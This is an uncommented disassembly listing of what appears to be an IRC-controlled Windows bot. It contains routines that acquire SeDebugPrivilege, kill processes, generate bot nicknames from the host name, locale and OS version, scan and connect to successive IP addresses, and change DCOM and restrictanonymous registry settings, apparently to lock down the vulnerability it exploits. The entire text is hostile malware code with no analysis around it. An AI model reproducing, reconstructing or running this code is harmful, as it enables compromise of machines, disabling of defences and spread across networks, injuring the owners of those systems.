push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_413B15
; ---------------------------------------------------------------------------
loc_413B02: ; CODE XREF: sub_4139F3+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_413B15
; ---------------------------------------------------------------------------
loc_413B09: ; CODE XREF: sub_4139F3+C2�j
; sub_4139F3+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_413B15
; ---------------------------------------------------------------------------
loc_413B10: ; CODE XREF: sub_4139F3+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_413B15: ; CODE XREF: sub_4139F3+40�j
; sub_4139F3+4A�j ...
push offset dword_46B270
call sub_415316
pop ecx
mov eax, offset dword_46B270
pop ecx
retn
sub_4139F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413B27 proc near ; CODE XREF: sub_40CD3A+2059�p
var_718 = byte ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_718]
push eax
call sub_417A19
add esp, 0Ch
lea eax, [ebp+arg_0]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+arg_0], esi
call dword_42113C ; GetComputerNameA
lea eax, [ebp+var_108]
push esi
push eax
lea eax, [ebp+var_318]
push eax
call sub_417A19
lea eax, [ebp+var_718]
push eax
call sub_4179FC
add esp, 10h
add eax, eax
push eax
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call dword_43CA34
test eax, eax
jnz short loc_413BB7
mov esi, offset dword_46B068
push offset dword_437A94
push esi
call sub_415316
pop ecx
pop ecx
jmp short loc_413BE0
; ---------------------------------------------------------------------------
loc_413BB7: ; CODE XREF: sub_413B27+7A�j
lea ecx, [ebp+var_718]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_4139F3
pop ecx
mov esi, offset dword_46B068
push eax
push offset dword_437A58
push esi
call sub_415316
add esp, 14h
loc_413BE0: ; CODE XREF: sub_413B27+8E�j
mov eax, esi
pop esi
leave
retn
sub_413B27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413BE5 proc near ; CODE XREF: sub_409D12+7�p
; sub_413C50+53�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call dword_421104 ; GetCurrentProcess
push eax
call dword_43CA08 ; OpenProcessToken
test eax, eax
jnz short loc_413C04
leave
retn
; ---------------------------------------------------------------------------
loc_413C04: ; CODE XREF: sub_413BE5+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_43C9E0 ; LookupPrivilegeValueA
test eax, eax
jz short loc_413C42
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_413C2B
or [ebp+var_8], 2
jmp short loc_413C2F
; ---------------------------------------------------------------------------
loc_413C2B: ; CODE XREF: sub_413BE5+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_413C2F: ; CODE XREF: sub_413BE5+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call dword_43CA90 ; AdjustTokenPrivileges
mov esi, eax
loc_413C42: ; CODE XREF: sub_413BE5+32�j
push [ebp+var_4]
call dword_42106C ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_413BE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413C50 proc near ; CODE XREF: sub_40CD3A+478E�p
; sub_413DFD+74�p
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp dword_43CA44, ebx
lea edi, [ebp+var_128]
mov [ebp+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_34C]
mov [ebp+var_350], ebx
rep stosd
jz short loc_413CF5
cmp dword_43CA28, ebx
jz short loc_413CF5
cmp dword_43C944, ebx
jz short loc_413CF5
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_413BE5
pop ecx
pop ecx
push ebx
push 0Fh
call dword_43CA44 ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz short loc_413CE8
lea eax, [ebp+var_12C]
mov [ebp+var_12C], 128h
push eax
push [ebp+var_4]
call dword_43CA28 ; Process32First
mov esi, dword_42106C
test eax, eax
jnz loc_413DAB
loc_413CE3: ; CODE XREF: sub_413C50+173�j
push [ebp+var_4]
call esi ; CloseHandle
loc_413CE8: ; CODE XREF: sub_413C50+69�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_413BE5
pop ecx
pop ecx
loc_413CF5: ; CODE XREF: sub_413C50+3A�j
; sub_413C50+42�j ...
xor eax, eax
loc_413CF7: ; CODE XREF: sub_413C50+1A8�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_413CFC: ; CODE XREF: sub_413C50+16D�j
cmp [ebp+arg_10], ebx
jnz loc_413DAB
cmp [ebp+arg_C], ebx
jnz loc_413D96
cmp [ebp+arg_4], ebx
jz loc_413DAB
push [ebp+var_124]
push 8
call dword_43CA44 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], ebx
mov edi, eax
mov [ebp+var_350], 224h
jz short loc_413D56
lea eax, [ebp+var_350]
push eax
push edi
call dword_43C8F0 ; Module32First
push [ebp+var_124]
test eax, eax
jz short loc_413D5C
lea eax, [ebp+var_230]
jmp short loc_413D62
; ---------------------------------------------------------------------------
loc_413D56: ; CODE XREF: sub_413C50+E4�j
push [ebp+var_124]
loc_413D5C: ; CODE XREF: sub_413C50+FC�j
lea eax, [ebp+var_108]
loc_413D62: ; CODE XREF: sub_413C50+104�j
push eax
lea eax, [ebp+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_415316
add esp, 10h
lea eax, [ebp+var_550]
push 1
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
push edi
call esi ; CloseHandle
jmp short loc_413DAB
; ---------------------------------------------------------------------------
loc_413D96: ; CODE XREF: sub_413C50+B8�j
push [ebp+arg_C]
lea eax, [ebp+var_108]
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_413DC8
loc_413DAB: ; CODE XREF: sub_413C50+8D�j
; sub_413C50+AF�j ...
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call dword_43C944 ; Process32Next
test eax, eax
jnz loc_413CFC
jmp loc_413CE3
; ---------------------------------------------------------------------------
loc_413DC8: ; CODE XREF: sub_413C50+159�j
push [ebp+var_124]
push ebx
push 1F0FFFh
call dword_42111C ; OpenProcess
push [ebp+var_4]
mov edi, eax
call esi ; CloseHandle
push ebx
push edi
call dword_421140 ; TerminateProcess
test eax, eax
jnz short loc_413DF5
push edi
call esi ; CloseHandle
jmp loc_413CF5
; ---------------------------------------------------------------------------
loc_413DF5: ; CODE XREF: sub_413C50+19B�j
xor eax, eax
inc eax
jmp loc_413CF7
sub_413C50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413DFD proc near ; DATA XREF: sub_40CD3A+5343�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset dword_437B64
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_298]
push eax
call sub_415316
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_413E5C
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_412BD1
add esp, 14h
loc_413E5C: ; CODE XREF: sub_413DFD+3D�j
push [ebp+var_10]
lea eax, [ebp+var_94]
push esi
push esi
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_413C50
add esp, 18h
test eax, eax
lea eax, [ebp+var_298]
jnz short loc_413E8A
push offset dword_437B28
jmp short loc_413E8F
; ---------------------------------------------------------------------------
loc_413E8A: ; CODE XREF: sub_413DFD+84�j
push offset dword_437AF0
loc_413E8F: ; CODE XREF: sub_413DFD+8B�j
push eax
call sub_415316
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_413EBC
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_412BD1
add esp, 14h
loc_413EBC: ; CODE XREF: sub_413DFD+9D�j
lea eax, [ebp+var_298]
push eax
call sub_40B078
push [ebp+var_14]
call sub_4150F0
pop ecx
pop ecx
push esi
call dword_421048 ; ExitThread
pop edi
pop esi
sub_413DFD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_413EDB proc near ; CODE XREF: sub_40CD3A+4730�p
; sub_414F15+4D�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
inc edi
push 0
push 1F0FFFh
call dword_42111C ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_413F0D
push 0
push esi
call dword_421140 ; TerminateProcess
test eax, eax
jnz short loc_413F0D
push esi
xor edi, edi
call dword_42106C ; CloseHandle
loc_413F0D: ; CODE XREF: sub_413EDB+1A�j
; sub_413EDB+27�j
mov eax, edi
pop edi
pop esi
retn
sub_413EDB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F12 proc near ; CODE XREF: sub_4036BB+A�p
; sub_403C74+16�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call sub_415372
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul dbl_421668
call sub_415E24
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_413F12 endp
; =============== S U B R O U T I N E =======================================
sub_413F42 proc near ; CODE XREF: sub_414278+4A�p
; DATA XREF: .text:off_437BB0�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call dword_42104C ; GetTickCount
push eax
call sub_415368
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset dword_42C2E4
push offset aS_1 ; "%s"
push 1Ch
push edi
call sub_41588A
xor esi, esi
add esp, 10h
cmp dword_42C25C, esi
jle short loc_413F9B
loc_413F75: ; CODE XREF: sub_413F42+57�j
call sub_415372
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_437C04
push 1Ch
push edi
call sub_41588A
add esp, 14h
inc esi
cmp esi, dword_42C25C
jl short loc_413F75
loc_413F9B: ; CODE XREF: sub_413F42+31�j
mov eax, edi
pop edi
pop esi
retn
sub_413F42 endp
; =============== S U B R O U T I N E =======================================
sub_413FA0 proc near ; CODE XREF: sub_40CD3A+3CBA�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call dword_42104C ; GetTickCount
push eax
call sub_415368
pop ecx
call sub_415372
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, dword_42C25C
test esi, esi
jle short loc_413FE3
loc_413FCD: ; CODE XREF: sub_413FA0+41�j
call sub_415372
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_413FCD
loc_413FE3: ; CODE XREF: sub_413FA0+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_413FA0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov dword ptr [ebp-4], 100h
call dword_42104C ; GetTickCount
push eax
call sub_415368
pop ecx
lea eax, [ebp-4]
mov esi, offset dword_437C0C
push eax
push esi
call dword_42113C ; GetComputerNameA
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_41588A
xor esi, esi
add esp, 0Ch
cmp dword_42C25C, esi
jle short loc_414056
loc_414030: ; CODE XREF: .text:00414054�j
call sub_415372
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_437C04
push 1Ch
push edi
call sub_41588A
add esp, 14h
inc esi
cmp esi, dword_42C25C
jl short loc_414030
loc_414056: ; CODE XREF: .text:0041402E�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call dword_42104C ; GetTickCount
push eax
call sub_415368
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call dword_421144 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset dword_437C10
push 1Ch
push edi
call sub_41588A
xor esi, esi
add esp, 10h
cmp dword_42C25C, esi
jle short loc_4140CB
loc_4140A5: ; CODE XREF: .text:004140C9�j
call sub_415372
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_437C04
push 1Ch
push edi
call sub_41588A
add esp, 14h
inc esi
cmp esi, dword_42C25C
jl short loc_4140A5
loc_4140CB: ; CODE XREF: .text:004140A3�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset byte_43B658
mov dword ptr [ebp-94h], 94h
call dword_42110C ; GetVersionExA
call dword_42104C ; GetTickCount
push eax
call sub_415368
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_414155
cmp dword ptr [ebp-8Ch], 0
jnz short loc_414135
cmp dword ptr [ebp-84h], 1
jnz short loc_414125
mov esi, offset a95 ; "95"
loc_414125: ; CODE XREF: .text:0041411E�j
cmp dword ptr [ebp-84h], 2
jnz short loc_414191
mov esi, offset aNt ; "NT"
jmp short loc_414191
; ---------------------------------------------------------------------------
loc_414135: ; CODE XREF: .text:00414115�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_414145
mov esi, offset a98 ; "98"
jmp short loc_414191
; ---------------------------------------------------------------------------
loc_414145: ; CODE XREF: .text:0041413C�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_41418C
mov esi, offset aMe ; "ME"
jmp short loc_414191
; ---------------------------------------------------------------------------
loc_414155: ; CODE XREF: .text:0041410C�j
cmp dword ptr [ebp-90h], 5
jnz short loc_41418C
cmp dword ptr [ebp-8Ch], 0
jnz short loc_41416E
mov esi, offset a2k ; "2K"
jmp short loc_414191
; ---------------------------------------------------------------------------
loc_41416E: ; CODE XREF: .text:00414165�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_41417E
mov esi, offset aXp ; "XP"
jmp short loc_414191
; ---------------------------------------------------------------------------
loc_41417E: ; CODE XREF: .text:00414175�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset dword_437C1C
jz short loc_414191
loc_41418C: ; CODE XREF: .text:0041414C�j
; .text:0041415C�j
mov esi, offset dword_42B868
loc_414191: ; CODE XREF: .text:0041412C�j
; .text:00414133�j ...
mov edi, [ebp+8]
push esi
push offset dword_437C14
push 1Ch
push edi
call sub_41588A
xor esi, esi
add esp, 10h
cmp dword_42C25C, esi
jle short loc_4141D5
loc_4141AF: ; CODE XREF: .text:004141D3�j
call sub_415372
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_437C04
push 1Ch
push edi
call sub_41588A
add esp, 14h
inc esi
cmp esi, dword_42C25C
jl short loc_4141AF
loc_4141D5: ; CODE XREF: .text:004141AD�j
mov eax, edi
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141DB proc near ; CODE XREF: sub_414278+5D�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call dword_42104C ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc ; "mIRC"
mov esi, eax
call dword_43CA30 ; FindWindowA
cmp esi, 64h
jbe short loc_41422A
test eax, eax
mov eax, offset dword_437C28
jnz short loc_414213
mov eax, offset byte_43B658
loc_414213: ; CODE XREF: sub_4141DB+31�j
push eax
push esi
push offset dword_437C20
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_41588A
add esp, 14h
jmp short loc_414244
; ---------------------------------------------------------------------------
loc_41422A: ; CODE XREF: sub_4141DB+28�j
test eax, eax
mov eax, offset dword_437C28
jnz short loc_414238
mov eax, offset byte_43B658
loc_414238: ; CODE XREF: sub_4141DB+56�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_415316
pop ecx
pop ecx
loc_414244: ; CODE XREF: sub_4141DB+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_415B10
pop ecx
cmp eax, 2
pop esi
jbe short loc_414273
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_416DB0
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_416BE0
add esp, 18h
loc_414273: ; CODE XREF: sub_4141DB+77�j
mov eax, [ebp+arg_0]
leave
retn
sub_4141DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414278 proc near ; CODE XREF: sub_40CA58+7F�p
; sub_40CBBE+50�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
xor esi, esi
loc_414281: ; CODE XREF: sub_414278+40�j
cmp [ebp+arg_C], 0
jz short loc_41429F
lea eax, dword_437BA0[esi]
push eax
push [ebp+arg_C]
call sub_415730
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41429F: ; CODE XREF: sub_414278+D�j
mov ecx, dword_437BAC[esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_4142AD: ; CODE XREF: sub_414278+25�j
test eax, eax
jnz short loc_4142BC
add esi, 14h
inc edi
cmp esi, 64h
jb short loc_414281
jmp short loc_4142CA
; ---------------------------------------------------------------------------
loc_4142BC: ; CODE XREF: sub_414278+37�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call off_437BB0[eax*4]
pop ecx
loc_4142CA: ; CODE XREF: sub_414278+42�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_4142DD
push [ebp+arg_0]
call sub_4141DB
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4142DD: ; CODE XREF: sub_414278+58�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_414278 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142E2 proc near ; DATA XREF: sub_4143AF+7B�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0B8h
mov eax, [ebp+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_B8]
push 10h
rep movsd
xor esi, esi
push 0
inc esi
mov [eax+0A4h], esi
lea eax, [ebp+var_10]
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_34]
call dword_43CA24 ; ntohs
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call dword_43CAA4 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4143A0
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_43C9CC ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_441BA4[ecx], esi
jz short loc_4143A0
push [ebp+var_34]
push [ebp+var_28]
call dword_43CAB0 ; inet_ntoa
push eax
mov edi, offset dword_46B8D8
push offset unk_437C2C
push edi
call sub_415316
push 0
lea eax, [ebp+var_B4]
push [ebp+var_20]
push edi
push eax
push [ebp+var_B8]
call sub_412BD1
push edi
call sub_40B078
add esp, 28h
loc_4143A0: ; CODE XREF: sub_4142E2+5D�j
; sub_4142E2+7E�j
push esi
call dword_43CABC ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_4142E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4143AF proc near ; DATA XREF: sub_40CD3A+3410�o
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Ah
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, dword_421060
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_4143DD: ; CODE XREF: sub_4143AF+EC�j
push [ebp+var_2C]
push [ebp+var_20]
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset unk_437C68
push eax
call sub_415316
lea eax, [ebp+var_130]
push 1FFh
push eax
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_441998
push eax
call sub_416BE0
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_4142E2
push edi
push edi
call dword_42108C ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_414449
jmp short loc_414444
; ---------------------------------------------------------------------------
loc_414440: ; CODE XREF: sub_4143AF+98�j
push 32h
call esi ; Sleep
loc_414444: ; CODE XREF: sub_4143AF+8F�j
cmp [ebp+var_C], edi
jz short loc_414440
loc_414449: ; CODE XREF: sub_4143AF+8D�j
push [ebp+var_4]
call dword_42106C ; CloseHandle
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
lea eax, [ebp+var_20]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_4153F0
add esp, 0Ch
push [ebp+arg_0]
call dword_43C958 ; ntohl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_43CA20 ; ntohl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_20]
push eax
call sub_4153F0
add esp, 0Ch
jmp loc_4143DD
sub_4143AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4144A0 proc near ; DATA XREF: sub_40CD3A+5979�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_4144E7
call sub_414500
jmp short loc_4144EC
; ---------------------------------------------------------------------------
loc_4144E7: ; CODE XREF: sub_4144A0+3E�j
call sub_414826
loc_4144EC: ; CODE XREF: sub_4144A0+45�j
add esp, 10h
push [ebp+var_14]
call sub_4150F0
pop ecx
push 0
call dword_421048 ; ExitThread
sub_4144A0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414500 proc near ; CODE XREF: sub_4144A0+40�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_43CAF0, edi
jnz loc_414632
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_43CA94 ; RegOpenKeyExA
test eax, eax
jnz short loc_41458B
mov ax, word_438058
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_43CA48 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_414573
push offset unk_438014
jmp short loc_414578
; ---------------------------------------------------------------------------
loc_414573: ; CODE XREF: sub_414500+6A�j
push offset dword_437FE4
loc_414578: ; CODE XREF: sub_414500+71�j
push eax
call sub_415316
pop ecx
pop ecx
push [ebp+var_4]
call dword_43CA00 ; RegCloseKey
jmp short loc_41459E
; ---------------------------------------------------------------------------
loc_41458B: ; CODE XREF: sub_414500+36�j
lea eax, [ebp+var_214]
push offset unk_437FA0
push eax
call sub_415316
pop ecx
pop ecx
loc_41459E: ; CODE XREF: sub_414500+89�j
cmp [ebp+arg_C], edi
jnz short loc_4145BD
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_4145BD: ; CODE XREF: sub_414500+A1�j
lea eax, [ebp+var_214]
push eax
call sub_40B078
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_43CA94 ; RegOpenKeyExA
test eax, eax
jnz short loc_41462B
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_43CA48 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_414613
push offset unk_437F38
jmp short loc_414618
; ---------------------------------------------------------------------------
loc_414613: ; CODE XREF: sub_414500+10A�j
push offset unk_437EF0
loc_414618: ; CODE XREF: sub_414500+111�j
push eax
call sub_415316
pop ecx
pop ecx
push [ebp+var_4]
call dword_43CA00 ; RegCloseKey
jmp short loc_414645
; ---------------------------------------------------------------------------
loc_41462B: ; CODE XREF: sub_414500+E2�j
push offset unk_437EA0
jmp short loc_414637
; ---------------------------------------------------------------------------
loc_414632: ; CODE XREF: sub_414500+13�j
push offset unk_437E58
loc_414637: ; CODE XREF: sub_414500+130�j
lea eax, [ebp+var_214]
push eax
call sub_415316
pop ecx
pop ecx
loc_414645: ; CODE XREF: sub_414500+129�j
cmp [ebp+arg_C], edi
jnz short loc_414664
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_414664: ; CODE XREF: sub_414500+148�j
lea eax, [ebp+var_214]
push eax
call sub_40B078
cmp dword_43CB18, edi
pop ecx
jnz loc_4147E1
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_414687: ; CODE XREF: sub_414500+2C5�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call dword_43C970
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_414726
cmp eax, 0EAh
jz short loc_414726
xor esi, esi
loc_4146B5: ; CODE XREF: sub_414500+21F�j
push off_437CA8[esi]
push edi
call sub_413225
pop ecx
pop ecx
push off_437CA8[esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_4146DA
push offset unk_437E20
jmp short loc_4146DF
; ---------------------------------------------------------------------------
loc_4146DA: ; CODE XREF: sub_414500+1D1�j
push offset unk_437DE0
loc_4146DF: ; CODE XREF: sub_414500+1D8�j
push 200h
push eax
call sub_41588A
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41470C
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_41470C: ; CODE XREF: sub_414500+1F0�j
lea eax, [ebp+var_214]
push eax
call sub_40B078
add esi, 8
pop ecx
cmp esi, 20h
jb short loc_4146B5
jmp loc_4147BE
; ---------------------------------------------------------------------------
loc_414726: ; CODE XREF: sub_414500+1AA�j
; sub_414500+1B1�j
